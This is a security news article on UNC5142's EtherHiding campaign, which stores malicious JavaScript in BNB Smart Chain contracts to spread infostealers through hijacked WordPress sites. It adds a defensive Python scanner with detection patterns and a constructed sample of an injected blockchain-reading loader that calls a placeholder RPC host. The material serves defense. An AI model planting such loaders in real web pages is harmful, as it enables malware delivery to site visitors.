Hackers Leveraging Blockchain: UNC5142’s Malware Campaign Targeting WordPress Sites


Hackers Exploit Blockchain Technology to Spread Malware Through WordPress Sites

A sophisticated hacking group known as UNC5142 has been leveraging blockchain smart contracts for malicious purposes to distribute dangerous malware through compromised WordPress websites, according to a new report from Google Threat Intelligence Group (GTIG). The campaign, discovered in June 2025, has affected approximately 14,000 web pages.

The threat actors use a technique called "EtherHiding," which conceals malicious code within the BNB Smart Chain blockchain, making it harder for security systems to detect and remove the threats. The operation primarily distributes information-stealing malware, including Atomic, Lumma, Rhadamanthys, and Vidar, targeting both Windows and macOS systems.

Sophisticated Multi-Stage Attack Process

The hackers employ a multi-stage JavaScript downloader called CLEARSHORT to execute their attacks. The process begins when a compromised WordPress site loads malicious JavaScript that interacts with smart contracts stored on the blockchain. These contracts then direct users to deceptive landing pages that trick them into running harmful commands.

The attack chain has evolved significantly since its inception. In late 2024, UNC5142 upgraded their infrastructure to a three-smart-contract system, implementing a Router-Logic-Storage architecture that allows quick updates to their attack parameters while maintaining operational resilience.

Advanced Blockchain Exploitation Techniques

The campaign's sophistication presents significant challenges for cybersecurity professionals and website owners. The abuse of blockchain technology provides several advantages to the attackers:

  • Blends with legitimate Web3 activity
  • Increases resistance to traditional detection methods
  • Allows for rapid payload updates at minimal cost ($0.25-$1.50 per change)
  • Provides enhanced operational agility

Mitigation Strategies and Security Measures

While Google reports no observed UNC5142 activity since July 23, 2025, website administrators should implement comprehensive security measures including:

  1. Regular updates of WordPress installations and plugins
  2. Implementation of strong security measures to prevent initial compromise
  3. Enhanced monitoring of site behavior for unexpected blockchain interactions
  4. Implementation of Web Application Firewalls (WAFs)
  5. Regular security audits focusing on blockchain-related activities
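A defender-side check for item 3 above and for the injected-script stage of the attack chain: this added example (not code from the GTIG report or from this article) scans a page's HTML for inline or external scripts that appear to read from a blockchain. The indicator patterns, the host allowlist, and the sample HTML are constructed assumptions for illustration, not indicators published for this campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic indicators that a script reads from an EVM-style chain such as BNB Smart Chain.
# They are this example's assumptions, not indicators published in the GTIG report.
INDICATORS = {
    "jsonrpc_eth_call": re.compile(r"\beth_call\b"),            # raw JSON-RPC contract read
    "web3_library": re.compile(r"\b(?:ethers|web3)\b", re.I),   # Web3 client library in use
    "bsc_rpc_host": re.compile(r"https?://[^\s'\"]*\bbsc\b[^\s'\"]*", re.I),  # URL naming BSC
}

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.inline, self.external, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []  # start capturing an inline script body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

def find_chain_interactions(html, allowed_hosts=frozenset()):
    """One finding per inline or external script that looks like it talks to a blockchain."""
    c = ScriptCollector()
    c.feed(html)
    findings = []
    for kind, items in (("inline", c.inline), ("external", c.external)):
        for item in items:
            if kind == "external" and urlparse(item).netloc.lower() in allowed_hosts:
                continue  # the site's own CDN or a vetted Web3 plugin host
            hits = sorted(n for n, rx in INDICATORS.items() if rx.search(item))
            if hits:
                findings.append({"kind": kind, "indicators": hits, "snippet": item.strip()[:72]})
    return findings

# Constructed sample page: benign CDN script, injected JSON-RPC loader (fake RPC host), benign theme script.
SAMPLE_HTML = """<html><head><script src="https://cdn.example-wp.test/jquery.min.js"></script>
<script>fetch("https://rpc.bsc.example.test", {method: "POST", body: JSON.stringify({jsonrpc: "2.0", id: 1,
  method: "eth_call", params: [{to: "0xPLACEHOLDER_CONTRACT", data: "0x"}, "latest"]})}).then(handleResult);
</script><script>console.log("benign theme script");</script></head><body>Welcome</body></html>"""
```

Run it against the HTML a site actually serves to visitors (not the stored theme files), since injected loaders are often added at render time; legitimate Web3 plugins will also trigger it, which is why the allowlist exists.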

The emergence of this sophisticated attack method demonstrates how cybercriminals continue to innovate, combining legitimate technologies with social engineering to create more effective attack vectors. As blockchain technology becomes more prevalent, security professionals must adapt their defensive strategies accordingly.

For more detailed information about blockchain-based attacks, visit the OWASP Smart Contract Security Guidelines.
